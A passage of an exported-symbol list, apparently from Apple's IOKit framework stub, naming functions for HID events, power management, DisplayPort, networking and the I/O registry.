_IOAVServiceSetPower, - _IOAVServiceSetProperty, _IOAVServiceSetVirtualEDIDMode, - _IOAVServiceStartInfoFrame, _IOAVServiceStartInfoFrameWithSource, - _IOAVServiceStartLink, _IOAVServiceStartLinkWithSource, - _IOAVServiceStopInfoFrame, _IOAVServiceStopInfoFrameWithSource, - _IOAVServiceStopLink, _IOAVServiceStopLinkWithSource, - _IOAVServiceSupportsLink, _IOAVStandardTypeString, - _IOAVSupportedVideoTimingDataListTypeString, _IOAVTransportString, - _IOAVVideoActiveFormatAspectRatio, _IOAVVideoAxisString, - _IOAVVideoColorBitDepth, _IOAVVideoColorBitDepthScalar, - _IOAVVideoColorCoefficientString, _IOAVVideoColorDynamicRangeString, - _IOAVVideoColorSpaceString, _IOAVVideoGetPixelClockTolerance, - _IOAVVideoInterfaceCopyColorElements, _IOAVVideoInterfaceCopyDiagnosticsString, - _IOAVVideoInterfaceCopyProperties, _IOAVVideoInterfaceCopyProperty, - _IOAVVideoInterfaceCopyTimingElements, _IOAVVideoInterfaceCreate, - _IOAVVideoInterfaceCreateWithLocation, _IOAVVideoInterfaceCreateWithService, - _IOAVVideoInterfaceGetLinkData, _IOAVVideoInterfaceGetLinkDataWithSource, - _IOAVVideoInterfaceGetService, _IOAVVideoInterfaceGetTypeID, - _IOAVVideoInterfaceSetBounds, _IOAVVideoInterfaceSetColorDitherRemoval, - _IOAVVideoInterfaceSetLogLevel, _IOAVVideoInterfaceSetLogLevelMask, - _IOAVVideoInterfaceSetProperty, _IOAVVideoInterfaceSetRotation, - _IOAVVideoInterfaceStartLink, _IOAVVideoInterfaceStartLinkWithSource, - _IOAVVideoInterfaceStopLink, _IOAVVideoInterfaceStopLinkWithSource, - _IOAVVideoLinkModeString, _IOAVVideoTimingCalculatedTypeString, - _IOAVVideoTimingGetActivePixelClock, _IOAVVideoTimingGetPixelClock, - _IOAVVideoTimingGetSyncRateRounded, _IOAVVideoTimingTypeString, - _IOAllowPowerChange, _IOBSDNameMatching, _IOCFSerialize, - _IOCFURLWriteDataAndPropertiesToResource, _IOCFUnserialize, - _IOCFUnserializeBinary, _IOCFUnserializeWithSize, - _IOCFUnserializeparse, _IOCancelPowerChange, _IOCatalogueGetData, - _IOCatalogueModuleLoaded, _IOCatalogueReset, _IOCatalogueSendData, - _IOCatalogueTerminate, _IOCatlogueGetGenCount, _IOCloseConnection, - _IOCompatibiltyNumber, _IOConnectAddClient, _IOConnectAddRef, - _IOConnectCallAsyncMethod, _IOConnectCallAsyncScalarMethod, - _IOConnectCallAsyncStructMethod, _IOConnectCallMethod, - _IOConnectCallScalarMethod, _IOConnectCallStructMethod, - _IOConnectGetService, _IOConnectMapMemory, _IOConnectMapMemory64, - _IOConnectRelease, _IOConnectSetCFProperties, _IOConnectSetCFProperty, - _IOConnectSetNotificationPort, _IOConnectTrap0, - _IOConnectTrap1, _IOConnectTrap2, _IOConnectTrap3, - _IOConnectTrap4, _IOConnectTrap5, _IOConnectTrap6, - _IOConnectUnmapMemory, _IOConnectUnmapMemory64, - _IOCopySystemLoadAdvisoryDetailed, _IOCreatePlugInInterfaceForService, - _IOCreateReceivePort, _IODPCalculateM, _IODPCommandString, - _IODPCompareLinkTrainingData, _IODPControllerCreate, - _IODPControllerCreateWithLocation, _IODPControllerCreateWithService, - _IODPControllerGetAVController, _IODPControllerGetMaxLaneCount, - _IODPControllerGetMaxLinkRate, _IODPControllerGetMinLaneCount, - _IODPControllerGetMinLinkRate, _IODPControllerGetTypeID, - _IODPControllerSetDownspreadModulationFrequency, - _IODPControllerSetDriveSettings, _IODPControllerSetLaneCount, - _IODPControllerSetLinkRate, _IODPControllerSetMaxLaneCount, - _IODPControllerSetMaxLinkRate, _IODPControllerSetMinLaneCount, - _IODPControllerSetMinLinkRate, _IODPControllerSetSupportsALPM, - _IODPControllerSetSupportsDownspread, _IODPControllerSetSupportsEnhancedMode, - _IODPControllerSetSupportsScrambling, _IODPCreateStringWithLinkTrainingData, - _IODPDeviceCreate, _IODPDeviceCreateWithLocation, - _IODPDeviceCreateWithService, _IODPDeviceGetAVDevice, - _IODPDeviceGetController, _IODPDeviceGetLinkTrainingData, - _IODPDeviceGetMaxLaneCount, _IODPDeviceGetMaxLinkRate, - _IODPDeviceGetRevisionMajor, _IODPDeviceGetRevisionMinor, - _IODPDeviceGetSinkCount, _IODPDeviceGetSupportsDownspread, - _IODPDeviceGetSupportsEnhancedMode, _IODPDeviceGetSymbolErrorCount, - _IODPDeviceGetTypeID, _IODPDeviceReadDPCD, _IODPDeviceSetALPMEnabled, - _IODPDeviceTypeString, _IODPDeviceWriteDPCD, _IODPDriveSettingsAreValid, - _IODPEventLogEventTypeString, _IODPLinkMaxPixelRate, - _IODPLinkRateEnum, _IODPLinkRateIsStandard, _IODPLinkRateScalar, - _IODPLinkSymbolRate, _IODPServiceCreate, _IODPServiceCreateWithLocation, - _IODPServiceCreateWithService, _IODPServiceGetAVService, - _IODPServiceGetDevice, _IODPServiceGetSinkCount, - _IODPServiceGetSymbolErrorCount, _IODPServiceGetTypeID, - _IODPServiceRetrainLink, _IODPServiceSetLinkCheckEnable, - _IODPStreamClockHz, _IODPTrainingPatternLength, - _IODPVideoMinLinkRate, _IODataQueueAllocateNotificationPort, - _IODataQueueDataAvailable, _IODataQueueDequeue, - _IODataQueueEnqueue, _IODataQueuePeek, _IODataQueueSetNotificationPort, - _IODataQueueWaitForAvailableData, _IODeregisterApp, - _IODeregisterForSystemPower, _IODestroyPlugInInterface, - _IODispatchCalloutFromCFMessage, _IODispatchCalloutFromMessage, - _IOEthernetControllerCreate, _IOEthernetControllerGetBSDSocket, - _IOEthernetControllerGetIONetworkInterfaceObject, - _IOEthernetControllerGetTypeID, _IOEthernetControllerReadPacket, - _IOEthernetControllerRegisterBSDAttachCallback, - _IOEthernetControllerRegisterDisableCallback, _IOEthernetControllerRegisterEnableCallback, - _IOEthernetControllerRegisterPacketAvailableCallback, - _IOEthernetControllerScheduleWithRunLoop, _IOEthernetControllerSetDispatchQueue, - _IOEthernetControllerSetLinkStatus, _IOEthernetControllerSetPowerSavings, - _IOEthernetControllerUnscheduleFromRunLoop, _IOEthernetControllerWritePacket, - _IOGetSystemLoadAdvisory, _IOHIDCopyCFTypeParameter, - _IOHIDCreateSharedMemory, _IOHIDDeviceClose, _IOHIDDeviceConformsTo, - _IOHIDDeviceCopyMatchingElements, _IOHIDDeviceCopyValueMultiple, - _IOHIDDeviceCopyValueMultipleWithCallback, _IOHIDDeviceCreate, - _IOHIDDeviceGetProperty, _IOHIDDeviceGetReport, - _IOHIDDeviceGetReportWithCallback, _IOHIDDeviceGetService, - _IOHIDDeviceGetTypeID, _IOHIDDeviceGetValue, _IOHIDDeviceGetValueWithCallback, - _IOHIDDeviceOpen, _IOHIDDeviceRegisterInputReportCallback, - _IOHIDDeviceRegisterInputReportWithTimeStampCallback, - _IOHIDDeviceRegisterInputValueCallback, _IOHIDDeviceRegisterRemovalCallback, - _IOHIDDeviceScheduleWithRunLoop, _IOHIDDeviceSetInputValueMatching, - _IOHIDDeviceSetInputValueMatchingMultiple, _IOHIDDeviceSetProperty, - _IOHIDDeviceSetReport, _IOHIDDeviceSetReportWithCallback, - _IOHIDDeviceSetValue, _IOHIDDeviceSetValueMultiple, - _IOHIDDeviceSetValueMultipleWithCallback, _IOHIDDeviceSetValueWithCallback, - _IOHIDDeviceUnscheduleFromRunLoop, _IOHIDElementAttach, - _IOHIDElementCopyAttached, _IOHIDElementCreateWithDictionary, - _IOHIDElementDetach, _IOHIDElementGetChildren, _IOHIDElementGetCollectionType, - _IOHIDElementGetCookie, _IOHIDElementGetDevice, - _IOHIDElementGetDuplicateIndex, _IOHIDElementGetLogicalMax, - _IOHIDElementGetLogicalMin, _IOHIDElementGetName, - _IOHIDElementGetParent, _IOHIDElementGetPhysicalMax, - _IOHIDElementGetPhysicalMin, _IOHIDElementGetProperty, - _IOHIDElementGetReportCount, _IOHIDElementGetReportID, - _IOHIDElementGetReportSize, _IOHIDElementGetType, - _IOHIDElementGetTypeID, _IOHIDElementGetUnit, _IOHIDElementGetUnitExponent, - _IOHIDElementGetUsage, _IOHIDElementGetUsagePage, - _IOHIDElementHasNullState, _IOHIDElementHasPreferredState, - _IOHIDElementIsArray, _IOHIDElementIsNonLinear, - _IOHIDElementIsRelative, _IOHIDElementIsVirtual, - _IOHIDElementIsWrapping, _IOHIDElementSetProperty, - _IOHIDEventAppendEvent, _IOHIDEventConformsTo, _IOHIDEventConformsToWithOptions, - _IOHIDEventCreate, _IOHIDEventCreateAccelerometerEvent, - _IOHIDEventCreateAccelerometerEventWithType, _IOHIDEventCreateAmbientLightSensorEvent, - _IOHIDEventCreateAtmosphericPressureEvent, _IOHIDEventCreateBiometricEvent, - _IOHIDEventCreateBoundaryScrollEvent, _IOHIDEventCreateButtonEvent, - _IOHIDEventCreateButtonEventWithPressure, _IOHIDEventCreateCompassEvent, - _IOHIDEventCreateCompassEventWithType, _IOHIDEventCreateCopy, - _IOHIDEventCreateData, _IOHIDEventCreateDigitizerEvent, - _IOHIDEventCreateDigitizerFingerEvent, _IOHIDEventCreateDigitizerFingerEventWithQuality, - _IOHIDEventCreateDigitizerStylusEvent, _IOHIDEventCreateDigitizerStylusEventWithPolarOrientation, - _IOHIDEventCreateDockSwipeEvent, _IOHIDEventCreateFluidTouchGestureEvent, - _IOHIDEventCreateForceEvent, _IOHIDEventCreateGyroEvent, - _IOHIDEventCreateGyroEventWithType, _IOHIDEventCreateKeyboardEvent, - _IOHIDEventCreateLEDEvent, _IOHIDEventCreateMotionActivtyEvent, - _IOHIDEventCreateMotionGestureEvent, _IOHIDEventCreateMouseEvent, - _IOHIDEventCreateNavigationSwipeEvent, _IOHIDEventCreateOrientationEvent, - _IOHIDEventCreatePolarOrientationEvent, _IOHIDEventCreateProgressEvent, - _IOHIDEventCreateProximtyEvent, _IOHIDEventCreateRelativePointerEvent, - _IOHIDEventCreateRotationEvent, _IOHIDEventCreateScaleEvent, - _IOHIDEventCreateScrollEvent, _IOHIDEventCreateSwipeEvent, - _IOHIDEventCreateSymbolicHotKeyEvent, _IOHIDEventCreateTranslationEvent, - _IOHIDEventCreateUnicodeEvent, _IOHIDEventCreateUnicodeEventWithQuality, - _IOHIDEventCreateVelocityEvent, _IOHIDEventCreateVendorDefinedEvent, - _IOHIDEventCreateWithBytes, _IOHIDEventCreateWithData, - _IOHIDEventCreateZoomToggleEvent, _IOHIDEventGetAttributeData, - _IOHIDEventGetAttributeDataLength, _IOHIDEventGetAttributeDataPtr, - _IOHIDEventGetChildren, _IOHIDEventGetDataLength, - _IOHIDEventGetDataValue, _IOHIDEventGetDataValueWithOptions, - _IOHIDEventGetEvent, _IOHIDEventGetEventFlags, _IOHIDEventGetEventWithOptions, - _IOHIDEventGetFloatMultiple, _IOHIDEventGetFloatMultipleWithOptions, - _IOHIDEventGetFloatValue, _IOHIDEventGetFloatValueWithOptions, - _IOHIDEventGetIntegerMultiple, _IOHIDEventGetIntegerMultipleWithOptions, - _IOHIDEventGetIntegerValue, _IOHIDEventGetIntegerValueWithOptions, - _IOHIDEventGetLatency, _IOHIDEventGetParent, _IOHIDEventGetPhase, - _IOHIDEventGetPosition, _IOHIDEventGetPositionWithOptions, - _IOHIDEventGetSenderID, _IOHIDEventGetTimeStamp, - _IOHIDEventGetType, _IOHIDEventGetTypeID, _IOHIDEventGetTypeString, - _IOHIDEventGetVendorDefinedData, _IOHIDEventIsAbsolute, - _IOHIDEventIsRepeat, _IOHIDEventQueueCreate, _IOHIDEventQueueCreateWithVM, - _IOHIDEventQueueDequeueCopy, _IOHIDEventQueueEnqueue, - _IOHIDEventQueueGetMemoryHandle, _IOHIDEventQueueGetNotificationPort, - _IOHIDEventQueueGetTypeID, _IOHIDEventQueueIsActive, - _IOHIDEventQueueSetNotificationPort, _IOHIDEventQueueStart, - _IOHIDEventQueueStop, _IOHIDEventReadBytes, _IOHIDEventRemoveEvent, - _IOHIDEventServerCreate, _IOHIDEventServerGetTypeID, - _IOHIDEventServerScheduleWithDispatchQueue, _IOHIDEventServerUnscheduleFromDispatchQueue, - _IOHIDEventSetAttributeData, _IOHIDEventSetEventFlags, - _IOHIDEventSetFloatMultiple, _IOHIDEventSetFloatMultipleWithOptions, - _IOHIDEventSetFloatValue, _IOHIDEventSetFloatValueWithOptions, - _IOHIDEventSetIntegerMultiple, _IOHIDEventSetIntegerMultipleWithOptions, - _IOHIDEventSetIntegerValue, _IOHIDEventSetIntegerValueWithOptions, - _IOHIDEventSetPhase, _IOHIDEventSetPosition, _IOHIDEventSetPositionWithOptions, - _IOHIDEventSetRepeat, _IOHIDEventSetSenderID, _IOHIDEventSetTimeStamp, - _IOHIDEventSystemClient, _IOHIDEventSystemClientCopyProperty, - _IOHIDEventSystemClientCopyServiceForRegistryID, - _IOHIDEventSystemClientCopyServices, _IOHIDEventSystemClientCreate, - _IOHIDEventSystemClientCreateWithType, _IOHIDEventSystemClientDispatchEvent, - _IOHIDEventSystemClientGetTypeID, _IOHIDEventSystemClientGetTypeString, - _IOHIDEventSystemClientRegisterDeviceMatchingBlock, - _IOHIDEventSystemClientRegisterDeviceMatchingCallback, - _IOHIDEventSystemClientRegisterEventBlock, _IOHIDEventSystemClientRegisterEventCallback, - _IOHIDEventSystemClientRegisterEventFilterBlock, - _IOHIDEventSystemClientRegisterEventFilterBlockWithPriority, - _IOHIDEventSystemClientRegisterEventFilterCallback, - _IOHIDEventSystemClientRegisterEventFilterCallbackWithPriority, - _IOHIDEventSystemClientRegisterPropertyChangedCallback, - _IOHIDEventSystemClientRegisterResetCallback, _IOHIDEventSystemClientRegistryIDConformsTo, - _IOHIDEventSystemClientScheduleWithDispatchQueue, - _IOHIDEventSystemClientScheduleWithRunLoop, _IOHIDEventSystemClientSetMatching, - _IOHIDEventSystemClientSetMatchingMultiple, _IOHIDEventSystemClientSetProperty, - _IOHIDEventSystemClientUnregisterDeviceMatchingBlock, - _IOHIDEventSystemClientUnregisterDeviceMatchingCallback, - _IOHIDEventSystemClientUnregisterEventBlock, _IOHIDEventSystemClientUnregisterEventCallback, - _IOHIDEventSystemClientUnregisterEventFilterBlock, - _IOHIDEventSystemClientUnregisterEventFilterCallback, - _IOHIDEventSystemClientUnregisterPropertyChangedCallback, - _IOHIDEventSystemClientUnregisterResetCallback, - _IOHIDEventSystemClientUnscheduleFromDispatchQueue, - _IOHIDEventSystemClientUnscheduleWithRunLoop, _IOHIDEventSystemClose, - _IOHIDEventSystemConnectionDispatchEvent, _IOHIDEventSystemConnectionGetAttribute, - _IOHIDEventSystemConnectionGetTask, _IOHIDEventSystemConnectionGetType, - _IOHIDEventSystemConnectionGetTypeID, _IOHIDEventSystemConnectionGetTypeString, - _IOHIDEventSystemCopyConnections, _IOHIDEventSystemCopyEvent, - _IOHIDEventSystemCopyMatchingServices, _IOHIDEventSystemCopyService, - _IOHIDEventSystemCopyServices, _IOHIDEventSystemCreate, - _IOHIDEventSystemGetProperty, _IOHIDEventSystemGetTypeID, - _IOHIDEventSystemOpen, _IOHIDEventSystemRegisterConnectionAdditionCallback, - _IOHIDEventSystemRegisterConnectionRemovalCallback, - _IOHIDEventSystemRegisterServicesCallback, _IOHIDEventSystemSetCallback, - _IOHIDEventSystemSetProperty, _IOHIDEventSystemUnregisterConnectionAdditionCallback, - _IOHIDEventSystemUnregisterConnectionRemovalCallback, - _IOHIDEventSystemUnregisterServicesCallback, _IOHIDEventTypeGetName, - _IOHIDGetAccelerationWithKey, _IOHIDGetActivityState, - _IOHIDGetButtonEventNum, _IOHIDGetModifierLockState, - _IOHIDGetMouseAcceleration, _IOHIDGetMouseButtonMode, - _IOHIDGetParameter, _IOHIDGetScrollAcceleration, - _IOHIDGetStateForSelector, _IOHIDManagerClose, _IOHIDManagerCopyDevices, - _IOHIDManagerCreate, _IOHIDManagerGetProperty, _IOHIDManagerGetTypeID, - _IOHIDManagerOpen, _IOHIDManagerRegisterDeviceMatchingCallback, - _IOHIDManagerRegisterDeviceRemovalCallback, _IOHIDManagerRegisterInputReportCallback, - _IOHIDManagerRegisterInputValueCallback, _IOHIDManagerSaveToPropertyDomain, - _IOHIDManagerScheduleWithRunLoop, _IOHIDManagerSetDeviceMatching, - _IOHIDManagerSetDeviceMatchingMultiple, _IOHIDManagerSetInputValueMatching, - _IOHIDManagerSetInputValueMatchingMultiple, _IOHIDManagerSetProperty, - _IOHIDManagerUnscheduleFromRunLoop, _IOHIDNotificationCreate, - _IOHIDNotificationGetClientCallback, _IOHIDNotificationGetClientRefcon, - _IOHIDNotificationGetClientTarget, _IOHIDNotificationGetOwnerCallback, - _IOHIDNotificationGetOwnerRefcon, _IOHIDNotificationGetOwnerTarget, - _IOHIDNotificationGetTypeID, _IOHIDPostEvent, _IOHIDQueueAddElement, - _IOHIDQueueContainsElement, _IOHIDQueueCopyNextValue, - _IOHIDQueueCopyNextValueWithTimeout, _IOHIDQueueCreate, - _IOHIDQueueGetDepth, _IOHIDQueueGetDevice, _IOHIDQueueGetTypeID, - _IOHIDQueueRegisterValueAvailableCallback, _IOHIDQueueRemoveElement, - _IOHIDQueueScheduleWithRunLoop, _IOHIDQueueSetDepth, - _IOHIDQueueStart, _IOHIDQueueStop, _IOHIDQueueUnscheduleFromRunLoop, - _IOHIDRegisterVirtualDisplay, _IOHIDServiceClientConformsTo, - _IOHIDServiceClientCopyEvent, _IOHIDServiceClientCopyProperty, - _IOHIDServiceClientGetRegistryID, _IOHIDServiceClientGetTypeID, - _IOHIDServiceClientRegisterRemovalBlock, _IOHIDServiceClientRegisterRemovalCallback, - _IOHIDServiceClientSetElementValue, _IOHIDServiceClientSetProperty, - _IOHIDServiceConformsTo, _IOHIDServiceConnectionCacheContainsKey, - _IOHIDServiceConnectionCacheCopyValueForKey, _IOHIDServiceConnectionCacheCreate, - _IOHIDServiceConnectionCacheGetReportDeadline, _IOHIDServiceConnectionCacheGetTypeID, - _IOHIDServiceConnectionCacheGetUnresponsiveness, - _IOHIDServiceConnectionCacheSetReportDeadline, _IOHIDServiceConnectionCacheSetUnresponsiveness, - _IOHIDServiceConnectionCacheSetValueForKey, _IOHIDServiceCopyEvent, - _IOHIDServiceCopyProperty, _IOHIDServiceCreatePropertyChangedNotification, - _IOHIDServiceCreateRemovalNotification, _IOHIDServiceFilterClose, - _IOHIDServiceFilterCopyPropertyForClient, _IOHIDServiceFilterCreate, - _IOHIDServiceFilterFilterCopyEvent, _IOHIDServiceFilterFilterEvent, - _IOHIDServiceFilterGetType, _IOHIDServiceFilterGetTypeID, - _IOHIDServiceFilterMatch, _IOHIDServiceFilterOpen, - _IOHIDServiceFilterSchedule, _IOHIDServiceFilterSetEventCallback, - _IOHIDServiceFilterSetOutputEvent, _IOHIDServiceFilterSetPropertyForClient, - _IOHIDServiceFilterUnschedule, _IOHIDServiceGetProperty, - _IOHIDServiceGetRegistryID, _IOHIDServiceGetTypeID, - _IOHIDServiceMatchPropertyTable, _IOHIDServiceSetElementValue, - _IOHIDServiceSetOutputEvent, _IOHIDServiceSetProperty, - _IOHIDSessionAddService, _IOHIDSessionClose, _IOHIDSessionCopyEvent, - _IOHIDSessionCreate, _IOHIDSessionFilterClose, _IOHIDSessionFilterCopyEvent, - _IOHIDSessionFilterCreate, _IOHIDSessionFilterFilterCopyEvent, - _IOHIDSessionFilterFilterEvent, _IOHIDSessionFilterGetPropertyForClient, - _IOHIDSessionFilterGetType, _IOHIDSessionFilterGetTypeID, - _IOHIDSessionFilterOpen, _IOHIDSessionFilterRegisterService, - _IOHIDSessionFilterScheduleWithDispatchQueue, _IOHIDSessionFilterSetPropertyForClient, - _IOHIDSessionFilterUnregisterService, _IOHIDSessionFilterUnscheduleFromDispatchQueue, - _IOHIDSessionGetProperty, _IOHIDSessionGetTypeID, - _IOHIDSessionOpen, _IOHIDSessionRemoveService, _IOHIDSessionSetProperty, - _IOHIDSetAccelerationWithKey, _IOHIDSetCFTypeParameter, - _IOHIDSetCursorBounds, _IOHIDSetCursorEnable, _IOHIDSetEventsEnable, - _IOHIDSetFixedMouseLocation, _IOHIDSetModifierLockState, - _IOHIDSetMouseAcceleration, _IOHIDSetMouseButtonMode, - _IOHIDSetMouseLocation, _IOHIDSetOnScreenCursorBounds, - _IOHIDSetParameter, _IOHIDSetScrollAcceleration, - _IOHIDSetStateForSelector, _IOHIDSetVirtualDisplayBounds, - _IOHIDTransactionAddElement, _IOHIDTransactionClear, - _IOHIDTransactionCommit, _IOHIDTransactionCommitWithCallback, - _IOHIDTransactionContainsElement, _IOHIDTransactionCreate, - _IOHIDTransactionGetDevice, _IOHIDTransactionGetDirection, - _IOHIDTransactionGetTypeID, _IOHIDTransactionGetValue, - _IOHIDTransactionRemoveElement, _IOHIDTransactionScheduleWithRunLoop, - _IOHIDTransactionSetDirection, _IOHIDTransactionSetValue, - _IOHIDTransactionUnscheduleFromRunLoop, _IOHIDUnregisterVirtualDisplay, - _IOHIDUserDeviceCreate, _IOHIDUserDeviceCreateWithOptions, - _IOHIDUserDeviceGetTypeID, _IOHIDUserDeviceHandleReport, - _IOHIDUserDeviceHandleReportAsync, _IOHIDUserDeviceHandleReportAsyncWithTimeStamp, - _IOHIDUserDeviceHandleReportWithTimeStamp, _IOHIDUserDeviceRegisterGetReportCallback, - _IOHIDUserDeviceRegisterGetReportWithReturnLengthCallback, - _IOHIDUserDeviceRegisterSetReportCallback, _IOHIDUserDeviceScheduleWithDispatchQueue, - _IOHIDUserDeviceScheduleWithRunLoop, _IOHIDUserDeviceUnscheduleFromDispatchQueue, - _IOHIDUserDeviceUnscheduleFromRunLoop, _IOHIDValueCreateWithBytes, - _IOHIDValueCreateWithBytesNoCopy, _IOHIDValueCreateWithIntegerValue, - _IOHIDValueGetBytePtr, _IOHIDValueGetElement, _IOHIDValueGetIntegerValue, - _IOHIDValueGetLength, _IOHIDValueGetScaledValue, - _IOHIDValueGetTimeStamp, _IOHIDValueGetTypeID, _IOInitContainerClasses, - _IOIteratorIsValid, _IOIteratorNext, _IOIteratorReset, - _IOKitGetBusyState, _IOKitWaitQuiet, _IOMIGMachPortCacheAdd, - _IOMIGMachPortCacheCopy, _IOMIGMachPortCacheRemove, - _IOMIGMachPortCreate, _IOMIGMachPortGetPort, _IOMIGMachPortGetTypeID, - _IOMIGMachPortRegisterDemuxCallback, _IOMIGMachPortRegisterTerminationCallback, - _IOMIGMachPortScheduleWithDispatchQueue, _IOMIGMachPortScheduleWithRunLoop, - _IOMIGMachPortUnscheduleFromDispatchQueue, _IOMIGMachPortUnscheduleFromRunLoop, - _IOMasterPort, _IONetworkClose, _IONetworkGetDataCapacity, - _IONetworkGetDataHandle, _IONetworkGetPacketFiltersMask, - _IONetworkOpen, _IONetworkReadData, _IONetworkResetData, - _IONetworkSetPacketFiltersMask, _IONetworkWriteData, - _IONotificationPortCreate, _IONotificationPortDestroy, - _IONotificationPortGetMachPort, _IONotificationPortGetRunLoopSource, - _IONotificationPortSetDispatchQueue, _IOObjectConformsTo, - _IOObjectCopyBundleIdentifierForClass, _IOObjectCopyClass, - _IOObjectCopySuperclassForClass, _IOObjectGetClass, - _IOObjectGetKernelRetainCount, _IOObjectGetRetainCount, - _IOObjectGetUserRetainCount, _IOObjectIsEqualTo, - _IOObjectRelease, _IOObjectRetain, _IOOpenConnection, - _IOOpenFirmwarePathMatching, _IOPMActivateSystemPowerSettings, - _IOPMAllowsBackgroundTask, _IOPMAllowsPushServiceTask, - _IOPMAssertionCopyProperties, _IOPMAssertionCreate, - _IOPMAssertionCreateWithDescription, _IOPMAssertionCreateWithName, - _IOPMAssertionCreateWithProperties, _IOPMAssertionDeclareNotificationEvent, - _IOPMAssertionDeclareSystemActivity, _IOPMAssertionDeclareUserActivity, - _IOPMAssertionNotify, _IOPMAssertionRelease, _IOPMAssertionRetain, - _IOPMAssertionSetBTCollection, _IOPMAssertionSetProperty, - _IOPMAssertionSetTimeout, _IOPMCancelAllRepeatingPowerEvents, - _IOPMCancelAllScheduledPowerEvents, _IOPMCancelScheduledPowerEvent, - _IOPMChangeSystemActivityAssertionBehavior, _IOPMClaimSystemWakeEvent, - _IOPMConnectionAcknowledgeEvent, _IOPMConnectionAcknowledgeEventWithOptions, - _IOPMConnectionCreate, _IOPMConnectionGetSystemCapabilities, - _IOPMConnectionRelease, _IOPMConnectionScheduleWithRunLoop, - _IOPMConnectionSetDispatchQueue, _IOPMConnectionSetNotification, - _IOPMConnectionUnscheduleFromRunLoop, _IOPMCopyActivePMPreferences, - _IOPMCopyActivePowerProfiles, _IOPMCopyAssertionActivityAggregate, - _IOPMCopyAssertionActivityAggregateWithAllocator, - _IOPMCopyAssertionActivityLog, _IOPMCopyAssertionActivityLogWithAllocator, - _IOPMCopyAssertionActivityUpdate, _IOPMCopyAssertionActivityUpdateWithAllocator, - _IOPMCopyAssertionsByProcess, _IOPMCopyAssertionsByProcessWithAllocator, - _IOPMCopyAssertionsByType, _IOPMCopyAssertionsStatus, - _IOPMCopyBatteryInfo, _IOPMCopyCPUPowerStatus, _IOPMCopyConnectionStatus, - _IOPMCopyCustomPMPreferences, _IOPMCopyHIDPostEventHistory, - _IOPMCopyPMPreferences, _IOPMCopyPowerHistory, _IOPMCopyPowerHistoryDetailed, - _IOPMCopyPowerProfiles, _IOPMCopyPowerStateInfo, - _IOPMCopyRepeatingPowerEvents, _IOPMCopyScheduledPowerEvents, - _IOPMCopySleepPreventersList, _IOPMCopySleepWakeFailure, - _IOPMCopySystemPowerSettings, _IOPMCopyUPSShutdownLevels, - _IOPMCopyUnabridgedActivePMPreferences, _IOPMCopyUserActivityLevelDescription, - _IOPMCtlAssertionType, _IOPMDebugTracePoint, _IOPMDeclareNetworkClientActivity, - _IOPMFeatureIsAvailable, _IOPMFeatureIsAvailableWithSupportedTable, - _IOPMFindPowerManagement, _IOPMGetActivePushConnectionState, - _IOPMGetAggressiveness, _IOPMGetCapabilitiesDescription, - _IOPMGetDarkWakeThermalEmergencyCount, _IOPMGetLastWakeTime, - _IOPMGetPerformanceWarningLevel, _IOPMGetSleepServicesActive, - _IOPMGetThermalWarningLevel, _IOPMGetUUID, _IOPMGetUserActivityLevel, - _IOPMGetValueInt, _IOPMIsADarkWake, _IOPMIsASilentWake, - _IOPMIsASleep, _IOPMIsAUserWake, _IOPMOverrideDefaultPMPreferences, - _IOPMPerformBlockWithAssertion, _IOPMPrefsNotificationCreateRunLoopSource, - _IOPMRequestSysWake, _IOPMRevertPMPreferences, _IOPMSchedulePowerEvent, - _IOPMScheduleRepeatingPowerEvent, _IOPMScheduleUserActiveChangedNotification, - _IOPMScheduleUserActivityLevelNotification, _IOPMSetActivePowerProfiles, - _IOPMSetActivePushConnectionState, _IOPMSetAggressiveness, - _IOPMSetAssertionActivityAggregate, _IOPMSetAssertionActivityLog, - _IOPMSetBTWakeInterval, _IOPMSetCustomPMPreferences, - _IOPMSetDWLingerInterval, _IOPMSetDebugFlags, _IOPMSetPMPreferences, - _IOPMSetReservePowerMode, _IOPMSetSleepServicesWakeTimeCap, - _IOPMSetSystemPowerSetting, _IOPMSetUPSShutdownLevels, - _IOPMSetValueInt, _IOPMSleepEnabled, _IOPMSleepSystem, - _IOPMSleepSystemWithOptions, _IOPMSleepWakeCopyUUID, - _IOPMSleepWakeSetUUID, _IOPMUnregisterNotification, - _IOPMUserDidChangeCallback, _IOPMUserIsActive, _IOPSAccCreateAttachNotification, - _IOPSAccCreateLimitedPowerNotification, _IOPSAccNotificationCreateRunLoopSource, - _IOPSCopyChargeLog, _IOPSCopyExternalPowerAdapterDetails, - _IOPSCopyInternalBatteriesArray, _IOPSCopyPowerSourcesByType, - _IOPSCopyPowerSourcesInfo, _IOPSCopyPowerSourcesList, - _IOPSCopyUPSArray, _IOPSCreateLimitedPowerNotification, - _IOPSCreatePowerSource, _IOPSDrawingUnlimitedPower, - _IOPSGetActiveBattery, _IOPSGetActiveUPS, _IOPSGetBatteryWarningLevel, - _IOPSGetPercentRemaining, _IOPSGetPowerSourceDescription, - _IOPSGetProvidingPowerSourceType, _IOPSGetSupportedPowerSources, - _IOPSGetTimeRemainingEstimate, _IOPSNotificationCreateRunLoopSource, - _IOPSPowerSourceSupported, _IOPSReleasePowerSource, - _IOPSRequestBatteryUpdate, _IOPSSetPowerSourceDetails, - _IORegisterApp, _IORegisterClient, _IORegisterForSystemPower, - _IORegistryCreateEnumerator, _IORegistryCreateIterator, - _IORegistryDisposeEnumerator, _IORegistryEntryCopyFromPath, - _IORegistryEntryCopyPath, _IORegistryEntryCreateCFProperties, - _IORegistryEntryCreateCFProperty, _IORegistryEntryCreateIterator, - _IORegistryEntryFromPath, _IORegistryEntryGetChildEntry, - _IORegistryEntryGetChildIterator, _IORegistryEntryGetLocationInPlane, - _IORegistryEntryGetName, _IORegistryEntryGetNameInPlane, - _IORegistryEntryGetParentEntry, _IORegistryEntryGetParentIterator, - _IORegistryEntryGetPath, _IORegistryEntryGetProperty, - _IORegistryEntryGetRegistryEntryID, _IORegistryEntryIDMatching, - _IORegistryEntryInPlane, _IORegistryEntrySearchCFProperty, - _IORegistryEntrySetCFProperties, _IORegistryEntrySetCFProperty, - _IORegistryEnumeratorNextConforming, _IORegistryEnumeratorReset, - _IORegistryGetRootEntry, _IORegistryIteratorEnterEntry, - _IORegistryIteratorExitEntry, _IOServiceAddInterestNotification, - _IOServiceAddMatchingNotification, _IOServiceAddNotification, - _IOServiceAuthorize, _IOServiceClose, _IOServiceGetBusyState, - _IOServiceGetBusyStateAndTime, _IOServiceGetMatchingService, - _IOServiceGetMatchingServices, _IOServiceGetState, - _IOServiceMatchPropertyTable, _IOServiceMatching, - _IOServiceNameMatching, _IOServiceOFPathToBSDName, - 